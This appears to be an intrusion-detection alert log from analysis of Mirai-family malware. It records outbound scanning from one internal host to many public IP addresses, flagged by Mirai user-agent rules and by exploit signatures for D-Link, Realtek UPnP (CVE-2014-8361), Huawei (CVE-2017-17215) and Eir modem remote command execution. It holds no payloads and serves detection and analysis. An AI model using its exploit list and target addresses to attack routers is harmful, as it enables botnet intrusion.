                            192.168.2.23200.110.56.6260036802846380 10/23/22-17:58:17.045499TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6003680192.168.2.23200.110.56.62
                            192.168.2.2388.216.212.9041186802027121 10/23/22-17:57:12.983209TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4118680192.168.2.2388.216.212.90
                            192.168.2.2388.210.101.14647222802027121 10/23/22-17:58:02.447409TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4722280192.168.2.2388.210.101.146
                            192.168.2.2395.179.164.22051574802027121 10/23/22-17:56:53.247965TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5157480192.168.2.2395.179.164.220
                            192.168.2.23169.62.56.11454474802846380 10/23/22-17:56:58.238376TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5447480192.168.2.23169.62.56.114
                            192.168.2.23178.250.168.4255516802846380 10/23/22-17:57:09.467309TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5551680192.168.2.23178.250.168.42
                            192.168.2.235.196.14.22152520802846457 10/23/22-17:57:46.216045TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5252080192.168.2.235.196.14.221
                            192.168.2.2379.143.177.11741010802841623 10/23/22-17:57:01.100624TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4101080192.168.2.2379.143.177.117
                            192.168.2.23122.116.201.16556410802846457 10/23/22-17:57:26.392157TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5641080192.168.2.23122.116.201.165
                            192.168.2.2395.0.234.3537934802027121 10/23/22-17:57:57.716202TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3793480192.168.2.2395.0.234.35
                            192.168.2.23213.94.201.7142222802846380 10/23/22-17:57:18.646359TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4222280192.168.2.23213.94.201.71
                            192.168.2.2395.56.225.17739400802027121 10/23/22-17:57:25.955765TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3940080192.168.2.2395.56.225.177
                            192.168.2.23156.232.160.14242154802841623 10/23/22-17:58:03.912064TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4215480192.168.2.23156.232.160.142
                            192.168.2.2388.221.182.23551106802027121 10/23/22-17:58:32.660992TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5110680192.168.2.2388.221.182.235
                            192.168.2.2395.215.177.14245136802027121 10/23/22-17:58:15.265611TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4513680192.168.2.2395.215.177.142
                            192.168.2.2385.228.41.14559924802846457 10/23/22-17:58:26.402621TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5992480192.168.2.2385.228.41.145
                            192.168.2.2388.221.60.19256346802027121 10/23/22-17:58:10.564137TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5634680192.168.2.2388.221.60.192
                            192.168.2.2335.76.110.7749512802835221 10/23/22-17:57:43.028125TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4951280192.168.2.2335.76.110.77
                            192.168.2.23176.31.131.5048328802835221 10/23/22-17:57:42.978234TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4832880192.168.2.23176.31.131.50
                            192.168.2.232.23.178.7735356802846457 10/23/22-17:57:03.750109TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3535680192.168.2.232.23.178.77
                            192.168.2.23122.237.29.8151658528692027339 10/23/22-17:58:36.025892TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5165852869192.168.2.23122.237.29.81
                            192.168.2.23178.114.128.13644374802846380 10/23/22-17:56:49.724019TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4437480192.168.2.23178.114.128.136
                            192.168.2.23164.155.207.1733602528692027339 10/23/22-17:58:36.207886TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3360252869192.168.2.23164.155.207.17
                            192.168.2.2395.59.179.11236332802027121 10/23/22-17:58:07.461025TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3633280192.168.2.2395.59.179.112
                            192.168.2.2389.252.157.17443302802846457 10/23/22-17:58:10.307732TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4330280192.168.2.2389.252.157.174
                            192.168.2.2395.216.25.2137636802027121 10/23/22-17:58:15.276581TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3763680192.168.2.2395.216.25.21
                            192.168.2.2361.220.207.23139504802846457 10/23/22-17:57:31.808963TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3950480192.168.2.2361.220.207.231
                            192.168.2.2380.94.147.21537666802846380 10/23/22-17:57:51.816472TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3766680192.168.2.2380.94.147.215
                            192.168.2.23195.123.231.14047156802846457 10/23/22-17:56:43.217353TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4715680192.168.2.23195.123.231.140
                            192.168.2.2386.10.33.12149246802846380 10/23/22-17:57:33.283670TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4924680192.168.2.2386.10.33.121
                            192.168.2.2389.251.20.5552836802846457 10/23/22-17:57:07.112689TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5283680192.168.2.2389.251.20.55
                            192.168.2.23156.240.40.25156694802841623 10/23/22-17:58:37.551895TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5669480192.168.2.23156.240.40.251
                            192.168.2.23195.211.100.2560994802846457 10/23/22-17:58:30.765652TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6099480192.168.2.23195.211.100.25
                            192.168.2.2382.100.18.4933506802846380 10/23/22-17:57:07.294407TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3350680192.168.2.2382.100.18.49
                            192.168.2.2388.221.10.2860992802027121 10/23/22-17:56:39.208604TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6099280192.168.2.2388.221.10.28
                            192.168.2.23195.55.52.5135300802841623 10/23/22-17:58:35.884313TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3530080192.168.2.23195.55.52.51
                            192.168.2.2384.118.219.7837654802846457 10/23/22-17:56:43.288482TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3765480192.168.2.2384.118.219.78
                            192.168.2.23178.32.17.15748436802846380 10/23/22-17:56:49.720400TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4843680192.168.2.23178.32.17.157
                            192.168.2.2337.150.237.12854910802846457 10/23/22-17:56:51.926567TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5491080192.168.2.2337.150.237.128
                            192.168.2.2395.55.233.22439874802027121 10/23/22-17:57:54.655648TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3987480192.168.2.2395.55.233.224
                            192.168.2.2388.77.251.737246802027121 10/23/22-17:58:02.129377TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3724680192.168.2.2388.77.251.7
                            192.168.2.2382.196.15.18440920802846380 10/23/22-17:58:04.014303TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4092080192.168.2.2382.196.15.184
                            192.168.2.23200.61.47.20360720802846380 10/23/22-17:57:14.220148TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6072080192.168.2.23200.61.47.203
                            192.168.2.2383.166.146.20951662802846380 10/23/22-17:57:22.143981TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5166280192.168.2.2383.166.146.209
                            192.168.2.23195.32.122.12946140802846457 10/23/22-17:56:43.219777TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4614080192.168.2.23195.32.122.129
                            192.168.2.2376.8.104.8342736802841623 10/23/22-17:58:11.415337TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4273680192.168.2.2376.8.104.83
                            192.168.2.2385.214.64.10940076802846457 10/23/22-17:57:16.979849TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4007680192.168.2.2385.214.64.109
                            192.168.2.232.17.94.13135892802846457 10/23/22-17:57:28.759198TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3589280192.168.2.232.17.94.131
                            192.168.2.23181.177.110.24940790802846380 10/23/22-17:57:48.710725TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4079080192.168.2.23181.177.110.249
                            192.168.2.2388.99.14.5255250802027121 10/23/22-17:58:19.560079TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5525080192.168.2.2388.99.14.52
                            192.168.2.23200.208.61.11841710802846380 10/23/22-17:58:22.247873TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4171080192.168.2.23200.208.61.118
                            192.168.2.23188.232.165.1074168875472835222 10/23/22-17:58:21.213326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)416887547192.168.2.23188.232.165.107
                            192.168.2.23156.244.32.16440912802841623 10/23/22-17:58:25.695789TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4091280192.168.2.23156.244.32.164
                            192.168.2.235.2.88.8552354802846457 10/23/22-17:57:02.927723TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5235480192.168.2.235.2.88.85
                            192.168.2.2388.116.147.14157218802027121 10/23/22-17:56:54.889745TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5721880192.168.2.2388.116.147.141
                            192.168.2.23164.46.58.17147272802846457 10/23/22-17:57:22.797573TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4727280192.168.2.23164.46.58.171
                            192.168.2.2382.102.13.10236816802846380 10/23/22-17:58:06.181287TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3681680192.168.2.2382.102.13.102
                            192.168.2.2389.161.195.9949878802846457 10/23/22-17:57:38.016792TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4987880192.168.2.2389.161.195.99
                            192.168.2.2388.99.113.9154952802027121 10/23/22-17:57:47.238141TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5495280192.168.2.2388.99.113.91
                            192.168.2.2385.195.140.20635646802846457 10/23/22-17:57:00.397651TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3564680192.168.2.2385.195.140.206
                            192.168.2.2349.12.56.7033412802841623 10/23/22-17:57:28.381541TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3341280192.168.2.2349.12.56.70
                            192.168.2.23112.175.10.19835010802027121 10/23/22-17:58:25.691640TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3501080192.168.2.23112.175.10.198
                            192.168.2.2354.246.138.24149212802835221 10/23/22-17:57:01.124424TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4921280192.168.2.2354.246.138.241
                            192.168.2.2388.147.135.11252966802027121 10/23/22-17:57:59.913056TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5296680192.168.2.2388.147.135.112
                            192.168.2.2386.189.206.344114275472023548 10/23/22-17:58:01.539645TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE411427547192.168.2.2386.189.206.34
                            192.168.2.2388.116.239.15456274802027121 10/23/22-17:56:51.027716TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5627480192.168.2.2388.116.239.154
                            192.168.2.23178.205.105.23042748802846380 10/23/22-17:57:09.510951TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4274880192.168.2.23178.205.105.230
                            192.168.2.2395.209.205.15544816802027121 10/23/22-17:57:25.764452TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4481680192.168.2.2395.209.205.155
                            192.168.2.2388.216.231.12838162802027121 10/23/22-17:58:07.287651TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3816280192.168.2.2388.216.231.128
                            192.168.2.23213.248.147.16737714802846380 10/23/22-17:56:47.038896TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3771480192.168.2.23213.248.147.167
                            192.168.2.2369.161.149.20935726802835222 10/23/22-17:58:21.288857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572680192.168.2.2369.161.149.209
                            192.168.2.2346.130.113.11139804802846457 10/23/22-17:58:15.493956TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3980480192.168.2.2346.130.113.111
                            192.168.2.23213.229.106.15140178802846380 10/23/22-17:56:42.732531TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4017880192.168.2.23213.229.106.151
                            192.168.2.23156.229.211.22939640802835221 10/23/22-17:57:28.747625TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3964080192.168.2.23156.229.211.229
                            192.168.2.2380.252.137.2243862802846380 10/23/22-17:58:25.099678TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4386280192.168.2.2380.252.137.22
                            192.168.2.2395.129.250.1842282802027121 10/23/22-17:56:48.880433TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4228280192.168.2.2395.129.250.18
                            192.168.2.2380.150.190.25254436802846457 10/23/22-17:57:32.436895TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5443680192.168.2.2380.150.190.252
                            192.168.2.23195.66.210.18059592802846457 10/23/22-17:58:21.688404TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5959280192.168.2.23195.66.210.180
                            192.168.2.23197.25.143.23243680802841623 10/23/22-17:57:01.386185TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4368080192.168.2.23197.25.143.232
                            192.168.2.2383.136.2.23745490802846380 10/23/22-17:57:15.823067TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4549080192.168.2.2383.136.2.237
                            192.168.2.2395.56.81.2141436802027121 10/23/22-17:57:10.506857TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4143680192.168.2.2395.56.81.21
                            192.168.2.2380.90.62.13958766802846380 10/23/22-17:58:25.058870TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5876680192.168.2.2380.90.62.139
                            192.168.2.23181.57.98.13559810802846380 10/23/22-17:56:47.476510TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5981080192.168.2.23181.57.98.135
                            192.168.2.23200.174.148.16147054802846380 10/23/22-17:58:22.686788TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4705480192.168.2.23200.174.148.161
                            192.168.2.2389.163.225.14736418802846457 10/23/22-17:57:38.008988TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3641880192.168.2.2389.163.225.147
                            192.168.2.2373.81.42.10756262802841623 10/23/22-17:57:07.567330TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5626280192.168.2.2373.81.42.107
                            192.168.2.2388.249.39.3548116802027121 10/23/22-17:56:55.724106TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4811680192.168.2.2388.249.39.35
                            192.168.2.2378.138.108.3835180802846457 10/23/22-17:57:47.779270TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3518080192.168.2.2378.138.108.38
                            192.168.2.235.189.155.18238420802846457 10/23/22-17:58:39.952224TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3842080192.168.2.235.189.155.182
                            192.168.2.2385.128.155.14947928802846457 10/23/22-17:57:58.561807TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4792880192.168.2.2385.128.155.149
                            192.168.2.2395.183.37.8950146802027121 10/23/22-17:57:21.058132TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5014680192.168.2.2395.183.37.89
                            192.168.2.2385.237.54.9639018802846457 10/23/22-17:58:26.432249TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3901880192.168.2.2385.237.54.96
                            192.168.2.2388.208.205.13840348802027121 10/23/22-17:58:35.005809TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4034880192.168.2.2388.208.205.138
                            192.168.2.23178.143.29.5842854802846380 10/23/22-17:58:13.493328TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4285480192.168.2.23178.143.29.58
                            192.168.2.23185.168.174.24038086802841623 10/23/22-17:58:11.394085TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3808680192.168.2.23185.168.174.240
                            192.168.2.23156.213.12.10237264802835221 10/23/22-17:58:14.113045TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3726480192.168.2.23156.213.12.102
                            192.168.2.2395.179.150.11842026802027121 10/23/22-17:56:48.741536TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4202680192.168.2.2395.179.150.118
                            192.168.2.23178.128.178.3145572802846380 10/23/22-17:58:27.560480TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4557280192.168.2.23178.128.178.31
                            192.168.2.2395.27.227.12840530802027121 10/23/22-17:57:28.487376TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4053080192.168.2.2395.27.227.128
                            192.168.2.235.23.51.10434274802846457 10/23/22-17:57:53.331368TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3427480192.168.2.235.23.51.104
                            192.168.2.2386.95.220.19935952802846380 10/23/22-17:57:01.321400TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3595280192.168.2.2386.95.220.199
                            192.168.2.2383.96.110.19341652802846380 10/23/22-17:57:15.955988TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4165280192.168.2.2383.96.110.193
                            192.168.2.235.180.104.11033960802846457 10/23/22-17:57:35.654459TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3396080192.168.2.235.180.104.110
                            192.168.2.2376.143.163.6552016802841623 10/23/22-17:57:12.577016TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5201680192.168.2.2376.143.163.65
                            192.168.2.2385.245.197.13947800802846457 10/23/22-17:57:58.553666TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4780080192.168.2.2385.245.197.139
                            192.168.2.23156.241.118.18548652802841623 10/23/22-17:57:35.661549TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4865280192.168.2.23156.241.118.185
                            192.168.2.2384.38.185.14360264802846457 10/23/22-17:57:46.329699TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6026480192.168.2.2384.38.185.143
                            192.168.2.2385.214.25.17840000802846457 10/23/22-17:56:48.675092TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4000080192.168.2.2385.214.25.178
                            192.168.2.2388.99.211.2741924802027121 10/23/22-17:57:05.124779TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4192480192.168.2.2388.99.211.27
                            192.168.2.2395.31.35.4049782802027121 10/23/22-17:57:18.864521TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4978280192.168.2.2395.31.35.40
                            192.168.2.2395.253.97.13150314802027121 10/23/22-17:58:37.493609TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5031480192.168.2.2395.253.97.131
                            192.168.2.2336.37.70.19260244372152835222 10/23/22-17:57:58.315251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024437215192.168.2.2336.37.70.192
                            192.168.2.2337.26.115.9636372802846457 10/23/22-17:56:51.848251TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3637280192.168.2.2337.26.115.96
                            192.168.2.235.196.28.9833874802846457 10/23/22-17:57:35.591913TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3387480192.168.2.235.196.28.98
                            192.168.2.2382.221.21.6460606802846380 10/23/22-17:58:36.892932TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6060680192.168.2.2382.221.21.64
                            192.168.2.23112.121.165.22941020802027121 10/23/22-17:58:29.892726TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4102080192.168.2.23112.121.165.229
                            192.168.2.2346.243.76.4733370802846457 10/23/22-17:58:24.014248TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3337080192.168.2.2346.243.76.47
                            192.168.2.23213.32.69.5654438802846380 10/23/22-17:56:41.505964TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5443880192.168.2.23213.32.69.56
                            192.168.2.232.17.52.21746952802846457 10/23/22-17:57:07.304161TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4695280192.168.2.232.17.52.217
                            192.168.2.235.161.125.25347892802846457 10/23/22-17:57:35.757469TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4789280192.168.2.235.161.125.253
                            192.168.2.2388.219.3.10539618802027121 10/23/22-17:57:02.473923TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3961880192.168.2.2388.219.3.105
                            192.168.2.2385.10.214.21851998802846457 10/23/22-17:57:00.275551TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5199880192.168.2.2385.10.214.218
                            192.168.2.23112.196.17.5256560802027121 10/23/22-17:57:52.205788TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5656080192.168.2.23112.196.17.52
                            192.168.2.2388.135.39.21053162802027121 10/23/22-17:57:54.816950TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5316280192.168.2.2388.135.39.210
                            192.168.2.23112.34.111.12838796802027121 10/23/22-17:56:58.091705TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3879680192.168.2.23112.34.111.128
                            192.168.2.2389.161.145.19943544802846457 10/23/22-17:57:55.917898TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4354480192.168.2.2389.161.145.199
                            192.168.2.2395.156.252.24948290802027121 10/23/22-17:56:55.703449TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4829080192.168.2.2395.156.252.249
                            192.168.2.23156.255.164.18741856802841623 10/23/22-17:57:28.948733TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4185680192.168.2.23156.255.164.187
                            192.168.2.2380.78.3.16059672802846380 10/23/22-17:56:39.216972TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5967280192.168.2.2380.78.3.160
                            192.168.2.23197.27.108.8940834802835222 10/23/22-17:57:40.421683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083480192.168.2.23197.27.108.89
                            192.168.2.2389.189.198.4758450802846457 10/23/22-17:57:43.770300TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5845080192.168.2.2389.189.198.47
                            192.168.2.2395.100.78.21333312802027121 10/23/22-17:57:45.076992TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3331280192.168.2.2395.100.78.213
                            192.168.2.23112.126.102.936288802027121 10/23/22-17:57:10.567170TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3628880192.168.2.23112.126.102.9
                            192.168.2.23200.58.114.6134364802846380 10/23/22-17:58:22.758351TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3436480192.168.2.23200.58.114.61
                            192.168.2.23213.188.204.24160806802846380 10/23/22-17:57:37.868952TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6080680192.168.2.23213.188.204.241
                            192.168.2.2384.184.229.16852704802846457 10/23/22-17:57:56.399410TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5270480192.168.2.2384.184.229.168
                            192.168.2.2385.214.72.20360748802846457 10/23/22-17:57:18.317427TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6074880192.168.2.2385.214.72.203
                            192.168.2.2383.85.134.20941880802846380 10/23/22-17:58:06.271924TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4188080192.168.2.2383.85.134.209
                            192.168.2.2385.118.202.13657850802846457 10/23/22-17:57:00.301592TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5785080192.168.2.2385.118.202.136
                            192.168.2.2388.208.46.2448630802027121 10/23/22-17:57:38.601501TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4863080192.168.2.2388.208.46.24
                            192.168.2.23112.186.243.14137720802027121 10/23/22-17:58:29.874545TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3772080192.168.2.23112.186.243.141
                            192.168.2.2346.232.89.21346668802846457 10/23/22-17:58:15.499399TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4666880192.168.2.2346.232.89.213
                            192.168.2.23195.7.232.4360146802846457 10/23/22-17:58:21.669709TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6014680192.168.2.23195.7.232.43
                            192.168.2.2361.241.102.12847924802846457 10/23/22-17:57:02.878954TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4792480192.168.2.2361.241.102.128
                            192.168.2.2389.161.208.8033030802846457 10/23/22-17:58:10.293377TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3303080192.168.2.2389.161.208.80
                            192.168.2.2388.198.81.11145392802027121 10/23/22-17:58:34.994957TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4539280192.168.2.2388.198.81.111
                            192.168.2.2388.99.185.18048222802027121 10/23/22-17:58:29.896573TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4822280192.168.2.2388.99.185.180
                            192.168.2.2388.216.98.23840924802027121 10/23/22-17:56:53.412111TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4092480192.168.2.2388.216.98.238
                            192.168.2.23200.123.238.545042802846380 10/23/22-17:57:30.754544TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4504280192.168.2.23200.123.238.5
                            192.168.2.235.39.174.19560302802846457 10/23/22-17:56:55.096205TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6030280192.168.2.235.39.174.195
                            192.168.2.23171.238.159.19444648802846457 10/23/22-17:56:55.131893TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4464880192.168.2.23171.238.159.194
                            192.168.2.2395.105.184.24936070802027121 10/23/22-17:57:25.752184TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3607080192.168.2.2395.105.184.249
                            192.168.2.2318.203.114.12335412802841623 10/23/22-17:56:48.003722TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3541280192.168.2.2318.203.114.123
                            192.168.2.2388.208.215.13537378802027121 10/23/22-17:56:51.056799TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3737880192.168.2.2388.208.215.135
                            192.168.2.2388.99.172.10056870802027121 10/23/22-17:57:21.048748TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5687080192.168.2.2388.99.172.100
                            192.168.2.2395.220.42.21041296802027121 10/23/22-17:58:21.910265TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4129680192.168.2.2395.220.42.210
                            192.168.2.23122.9.140.21357004802846457 10/23/22-17:57:14.271185TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5700480192.168.2.23122.9.140.213
                            192.168.2.2382.223.100.17842044802846380 10/23/22-17:57:46.332141TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4204480192.168.2.2382.223.100.178
                            192.168.2.235.235.250.21135562802846457 10/23/22-17:56:55.184860TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3556280192.168.2.235.235.250.211
                            192.168.2.2393.176.161.555027675472023548 10/23/22-17:58:32.220679TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE502767547192.168.2.2393.176.161.55
                            192.168.2.2395.97.228.2050406802027121 10/23/22-17:57:57.698014TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5040680192.168.2.2395.97.228.20
                            192.168.2.232.20.225.5953198802846457 10/23/22-17:57:07.070140TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5319880192.168.2.232.20.225.59
